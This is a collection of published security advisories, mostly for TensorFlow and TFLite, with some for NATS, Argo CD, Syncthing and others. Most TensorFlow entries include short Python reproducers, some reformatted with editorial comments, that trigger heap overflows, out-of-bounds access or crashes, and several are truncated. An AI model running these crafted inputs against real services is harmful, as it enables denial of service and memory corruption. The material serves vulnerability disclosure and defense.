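# sizeof(dummy) + sizeof(dummy.data[0]) * size wrap negative in a 32-bit int.
HEADER_BYTES = 8   # assumed sizeof(TfLiteIntArray)
INT_BYTES = 4      # assumed sizeof(dummy.data[0])

def as_int32(x):
    """Reduce x modulo 2**32 and reinterpret it as a signed 32-bit value."""
    x &= 0xFFFFFFFF
    return x - 0x1_0000_0000 if x >= 0x8000_0000 else x

size = 0x2000_0000  # dimension count taken from a crafted model
print(as_int32(HEADER_BYTES + INT_BYTES * size))  # negative value handed to malloc
```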

Integer overflow in TFLite concatenation

The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …

Incorrect handling of credential expiry by NATS Server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26892.txt ) Problem Description NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. The NATS accounts system has expiration timestamps on credentials; the https://github.com/nats-io/jwt library had an API which encouraged misuse and an IsRevoked() method which misused its own API. A new IsClaimRevoked() method has correct handling and the nats-server has been updated to use this. The old IsRevoked() method …

Incorrect handling of credential expiry by nats-io/nats-server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26892.txt ) Problem Description NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. The NATS accounts system has expiration timestamps on credentials; the https://github.com/nats-io/jwt library had an API which encouraged misuse and an IsRevoked() method which misused its own API. A new IsClaimRevoked() method has correct handling and the nats-server has been updated to use this. The old IsRevoked() method …

Incorrect Default Permissions

A privilege escalation vulnerability impacting the Google Exposure Notification Verification Server (versions prior to 0.23.1) allows an attacker who (1) has UserWrite permissions and (2) uses a carefully crafted request or a malicious proxy to create another user with higher privileges than their own. This occurs due to insufficient checks on the allowed set of permissions. The new user creation event would be captured in the Event Log.

Incorrect Calculation of Buffer Size

TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices. This is because the implementation does a double redirection to access an element of an array allocated on the heap. If the value at indices + 1 is outside the bounds of csr_row_ptr, this results in writing outside of bounds of …

Incomplete validation in `tf.raw_ops.CTCLoss`

Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …
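
Only the first (out-of-bounds read) reproducer is given in full above; here it is as a script, with editorial comments.

```python
import tensorflow as tf

# inputs has a zero-sized inner dimension, and labels_indices declares 8 rows
# but carries no coordinate data while labels_values still holds 8 entries.
inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32)
labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64)
labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32)
sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32)

tf.raw_ops.CTCLoss(
    inputs=inputs, labels_indices=labels_indices, labels_values=labels_values,
    sequence_length=sequence_length, preprocess_collapse_repeated=True,
    ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True)
```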

Incomplete validation in `SparseReshape`

Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)
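
The reproducer as a script (comments editorial):

```python
import tensorflow as tf

# input_indices describes a single entry with one coordinate, which is
# inconsistent with the 11-dimensional input_shape; the mismatch ends in
# the CHECK failure described above.
input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64)
input_shape = tf.zeros([11], dtype=tf.int64)
new_shape = tf.zeros([1], dtype=tf.int64)

tf.raw_ops.SparseReshape(
    input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)
```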

Incomplete validation in `SparseAdd`

Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)
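
Laid out as a script for readability (comments editorial):

```python
import tensorflow as tf

# a_indices claims 10 entries with 97 coordinates each, while a_shape and the
# entire b_* operand are empty.
a_indices = tf.zeros([10, 97], dtype=tf.int64)
a_values = tf.zeros([10], dtype=tf.int64)
a_shape = tf.zeros([0], dtype=tf.int64)
b_indices = tf.zeros([0, 0], dtype=tf.int64)
b_values = tf.zeros([0], dtype=tf.int64)
b_shape = tf.zeros([0], dtype=tf.int64)

tf.raw_ops.SparseAdd(
    a_indices=a_indices, a_values=a_values, a_shape=a_shape,
    b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=0)
```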

Improper Verification of Cryptographic Signature

Lotus is an implementation of the Filecoin protocol written in Go. BLS signature validation in Lotus uses the blst library method VerifyCompressed. This method accepts signatures in two forms, "serialized" and "compressed", meaning that BLS signatures can be provided as either of two distinct byte arrays. Lotus block validation functions perform a uniqueness check on provided blocks. Two blocks are considered distinct if the CIDs of their block headers do not match. …

Improper Input Validation

Syncthing is a continuous file synchronization program. In Syncthing before version 1.15.0, the relay server strelaysrv can be caused to crash and exit by sending a relay message with a negative length field. Similarly, Syncthing itself can crash for the same reason if given a malformed message from a malicious relay server when attempting to join the relay. Relay joins are essentially random (from a subset of low latency relays) …

Improper Check for Unusual or Exceptional Conditions

TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad. This is because the implementation does not validate the rank of the input_* tensors. In turn, this results in the tensors being passed as they are to QuantizeAndDequantizePerChannelGradientImpl. However, the vec<T> method requires the rank to be 1 and triggers a CHECK failure otherwise. The fix will be …

Improper Certificate Validation

In SPIRE 0.8.1 through 0.8.4 and before versions 0.9.4, 0.10.2, 0.11.3 and 0.12.1, specially crafted requests to the FetchX509SVID RPC of SPIRE Server’s Legacy Node API can result in the possible issuance of an X.509 certificate with a URI SAN for a SPIFFE ID that the agent is not authorized to distribute. Proper controls are in place to require that the caller presents a valid agent certificate that is already …

Import token permissions checking not enforced

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt) Problem Description The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …

Import of incorrectly embargoed keys could cause early publication

Impact If your installation is using the export-importer service, there is potential impact. If your installation is not importing keys via the export-importer services, your installation is not impacted. In versions 0.19.1 and earlier, the export-importer service assumed that the server it was importing from had properly embargoed keys for at least 2 hours after their expiry time. There are now known instances of servers that did not properly embargo …

Import loops in account imports, nats-server DoS

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-28466.txt) Problem Description An export/import cycle between accounts could crash the nats-server, after consuming CPU and memory. This issue was fixed publicly in https://github.com/nats-io/nats-server/pull/1731 in November 2020. The need to call this out as a security issue was highlighted by snyk.io and we are grateful for their assistance in doing so. Organizations which run a NATS service providing access to accounts run by untrusted third parties …

Helm OCI credentials leaked into Argo CD logs

Impact When Argo CD was connected to a Helm OCI repository with authentication enabled, the credentials used for accessing the remote repository were logged. Anyone with access to the pod logs - either via access with appropriate permissions to the Kubernetes control plane or a third party log management system where the logs from Argo CD were aggregated - could have potentially obtained the credentials to the Helm OCI repository. …

Heap out of bounds write in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)
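
The call spelled out; the comment on the splits is editorial.

```python
import tensorflow as tf

tf.raw_ops.RaggedBincount(
    splits=[7, 8],  # valid row splits must start at 0, so this layout is invalid
    values=[5, 16, 51, 76, 29, 27, 54, 95],
    size=59,
    weights=[0, 0, 0, 0, 0, 0, 0, 0],
    binary_output=False)
```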

Heap out of bounds read in `RequantizationRange`

The implementation of tf.raw_ops.RequantizationRange can cause reads outside of bounds of heap allocated data if an attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)
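
The reproducer as a script; comments are editorial, and the input is bound to a local name to avoid shadowing the Python builtin.

```python
import tensorflow as tf

# input_min and input_max are empty tensors, which the op reads from anyway.
inp = tf.constant([1], shape=[1], dtype=tf.qint32)
input_min = tf.constant([], dtype=tf.float32)
input_max = tf.constant([], dtype=tf.float32)

tf.raw_ops.RequantizationRange(input=inp, input_min=input_min, input_max=input_max)
```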

Heap out of bounds read in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)
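
Formatted as a script (comments editorial):

```python
import tensorflow as tf

# grad and argmax are inconsistent with the pooled shape of the input, which
# leads to the out-of-bounds reads described above.
inp = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32)
grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32)
argmax = tf.constant([1], shape=[1], dtype=tf.int64)

tf.raw_ops.MaxPoolGradWithArgmax(
    input=inp, grad=grad, argmax=argmax,
    ksize=[1, 1, 1, 1], strides=[1, 1, 1, 1],
    padding='SAME', include_batch_in_index=False)
```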

Heap out of bounds in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …

Heap OOB write in TFLite

A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …

Heap OOB read in TFLite

A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }

Heap OOB read in `tf.raw_ops.Dequantize`

Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …

Heap OOB in `QuantizeAndDequantizeV3`

An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)
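
The one-call reproducer, formatted with an editorial comment:

```python
import tensorflow as tf

# axis=3 is out of range for the rank-1 input list below.
tf.raw_ops.QuantizeAndDequantizeV3(
    input=[2.5, 2.5], input_min=[0, 0], input_max=[1, 1], num_bits=[30],
    signed_input=False, range_given=False, narrow_range=False, axis=3)
```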

Heap OOB and null pointer dereference in `RaggedTensorToTensor`

Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)
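
As a script (comments editorial):

```python
import tensorflow as tf

# values is empty while a ROW_SPLITS partition and a negative target shape
# are still supplied.
shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64)
values = tf.constant([], shape=[0], dtype=tf.int64)
default_value = tf.constant(404, dtype=tf.int64)
row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64)

tf.raw_ops.RaggedTensorToTensor(
    shape=shape, values=values, default_value=default_value,
    row_partition_tensors=[row], row_partition_types=['ROW_SPLITS'])
```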

Heap OOB access in unicode ops

An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)
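
The reproducer as a script (comments editorial):

```python
import tensorflow as tf

# input_splits points at offsets 81 and 101 in a one-element input_values tensor.
input_values = tf.constant([58], shape=[1], dtype=tf.int32)
input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32)

tf.raw_ops.UnicodeEncode(
    input_values=input_values, input_splits=input_splits, output_encoding="UTF-8")
```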

Heap OOB access in `Dilation2DBackpropInput`

An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')
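
Laid out as a script; the comments are editorial.

```python
import tensorflow as tf

# The filter tensor is empty (zero-sized dimensions), one of the invalid
# arguments the advisory describes.
input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32)
filt = tf.constant([], shape=[0, 0, 3], dtype=tf.float32)
out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32)

tf.raw_ops.Dilation2DBackpropInput(
    input=input_tensor, filter=filt, out_backprop=out_backprop,
    strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')
```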

Heap buffer overflow in `StringNGrams`

An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `SparseTensorToCSRSparseMatrix`

An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([0.0], dtype=np.float32) dense_shape = [0, 0] st = tf.SparseTensor(indices_array, value_array, dense_shape) values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape)
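
The reproducer as a script (comments editorial):

```python
import numpy as np
import tensorflow as tf
from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops

# A sparse tensor that supplies one index/value pair but declares an empty
# [0, 0] dense shape.
indices_array = np.array([[0, 0]])
value_array = np.array([0.0], dtype=np.float32)
dense_shape = [0, 0]
st = tf.SparseTensor(indices_array, value_array, dense_shape)

sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix(
    st.indices, st.values, st.dense_shape)
```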

Heap buffer overflow in `SparseSplit`

An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)
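
As a script (comments editorial):

```python
import tensorflow as tf

# The single index value (1) lies outside the declared dimension size of 1.
shape_dims = tf.constant(0, dtype=tf.int64)
indices = tf.ones([1, 1], dtype=tf.int64)
values = tf.ones([1], dtype=tf.int64)
shape = tf.ones([1], dtype=tf.int64)

tf.raw_ops.SparseSplit(
    split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)
```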

Heap buffer overflow in `RaggedTensorToTensor`

An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)
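
The call spelled out; the comments are editorial.

```python
import tensorflow as tf

tf.raw_ops.RaggedBincount(
    splits=[0],                   # a single split entry describes zero rows...
    values=[1, 1, 1, 1, 1],       # ...yet five values are supplied
    size=5,
    weights=[1, 2, 3, 4],         # and only four weights
    binary_output=False)
```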

Heap buffer overflow in `QuantizedResizeBilinear`

An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)
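
The reproducer as a script; comments are editorial, and the threshold tensors are bound to local names to avoid shadowing Python builtins.

```python
import tensorflow as tf

# Empty images/size and, in particular, empty min/max quantization thresholds.
images = tf.constant([], shape=[0], dtype=tf.qint32)
size = tf.constant([], shape=[0], dtype=tf.int32)
range_min = tf.constant([], dtype=tf.float32)
range_max = tf.constant([], dtype=tf.float32)

tf.raw_ops.QuantizedResizeBilinear(
    images=images, size=size, min=range_min, max=range_max,
    align_corners=False, half_pixel_centers=False)
```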

Heap buffer overflow in `QuantizedReshape`

An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)
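
Formatted as a script (comments editorial):

```python
import tensorflow as tf

# All inputs, including the quantization thresholds, are empty tensors.
tensor = tf.constant([], dtype=tf.qint32)
shape = tf.constant([], dtype=tf.int32)
input_min = tf.constant([], dtype=tf.float32)
input_max = tf.constant([], dtype=tf.float32)

tf.raw_ops.QuantizedReshape(
    tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)
```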

Heap buffer overflow in `QuantizedMul`

An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
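
As a script (comments editorial):

```python
import tensorflow as tf

# The min/max quantization thresholds for both operands are empty tensors.
x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8)
y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8)
min_x = tf.constant([], dtype=tf.float32)
max_x = tf.constant([], dtype=tf.float32)
min_y = tf.constant([], dtype=tf.float32)
max_y = tf.constant([], dtype=tf.float32)

tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
```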

Heap buffer overflow in `MaxPoolGrad`

The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])
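
The reproducer as a script (comments editorial):

```python
import tensorflow as tf

# grad is an empty [0, 0, 0, 0] tensor while orig_input / orig_output are not.
orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32)
orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32)
grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)

tf.raw_ops.MaxPoolGrad(
    orig_input=orig_input, orig_output=orig_output, grad=grad,
    ksize=[1, 1, 1, 1], strides=[1, 1, 1, 1], padding="SAME", explicit_paddings=[])
```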

Heap buffer overflow in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …

Heap buffer overflow in `FractionalAvgPoolGrad`

The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow:

```python
import tensorflow as tf

orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64)
out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64)
row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64)
col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64)
tf.raw_ops.FractionalAvgPoolGrad(
    orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop,
    row_pooling_sequence=row_pooling_sequence,
    col_pooling_sequence=col_pooling_sequence, overlapping=False)
```

Heap buffer overflow in `Conv3DBackprop*`

Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows:

```python
import tensorflow as tf

input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32)
filter_tensor = tf.constant(
    [734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0,
     -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0,
     -10.0, -10.0, -10.0, -10.0, -10.0, -10.0],
    shape=[4, 1, 6, 1, 1], dtype=tf.float32)
out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropInputV2(
    input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …
```

Heap buffer overflow in `Conv2DBackpropFilter`

An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter:

```python
import tensorflow as tf

input_tensor = tf.constant([386.078431372549, 386.07843139643234],
                           shape=[1, 1, 1, 2], dtype=tf.float32)
filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(
    input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop,
    strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID',
    explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])
```

Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …

Heap buffer overflow in `BandedTriangularSolve`

An attacker can trigger a heap buffer overflow in the Eigen implementation of tf.raw_ops.BandedTriangularSolve:

```python
import tensorflow as tf
import numpy as np

matrix_array = np.array([])
matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array, (0, 1)), dtype=tf.float32)
rhs_array = np.array([1, 1])
rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array, (1, 2)), dtype=tf.float32)
tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor, rhs=rhs_tensor)
```
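A rough caller-side sketch (the helper and the shape relationship it assumes are illustrative, not the upstream fix) would refuse the empty and mismatched shapes used above before they reach Eigen:

```python
import tensorflow as tf

def checked_banded_triangular_solve(matrix, rhs):
    # Reject the shapes from the reproduction above: no zero-sized dimensions,
    # and (under the assumption that matrix columns must line up with rhs rows)
    # require the inner dimensions to agree.
    if 0 in matrix.shape or 0 in rhs.shape:
        raise ValueError("matrix and rhs must not contain zero-sized dimensions")
    if matrix.shape[-1] != rhs.shape[-2]:
        raise ValueError(f"incompatible shapes {matrix.shape} and {rhs.shape}")
    return tf.raw_ops.BandedTriangularSolve(matrix=matrix, rhs=rhs)
```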

Heap buffer overflow in `AvgPool3DGrad`

The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow:

```python
import tensorflow as tf

orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32)
grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32)
ksize = [1, 1, 1, 1, 1]
strides = [1, 1, 1, 1, 1]
padding = "SAME"
tf.raw_ops.AvgPool3DGrad(
    orig_input_shape=orig_input_shape, grad=grad, ksize=ksize,
    strides=strides, padding=padding)
```

Heap buffer overflow caused by rounding

An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in an off-by-one error when accessing image elements:

```python
import tensorflow as tf

l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384]
images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32)
size = tf.constant([12, 6], shape=[2], dtype=tf.int32)
min = tf.constant(80.22522735595703)
max = tf.constant(80.39215850830078)
tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, …
```

Heap buffer overflow and undefined behavior in `FusedBatchNorm`

The implementation of tf.raw_ops.FusedBatchNorm is vulnerable to a heap buffer overflow:

```python
import tensorflow as tf

x = tf.zeros([10, 10, 10, 6], dtype=tf.float32)
scale = tf.constant([0.0], shape=[1], dtype=tf.float32)
offset = tf.constant([0.0], shape=[1], dtype=tf.float32)
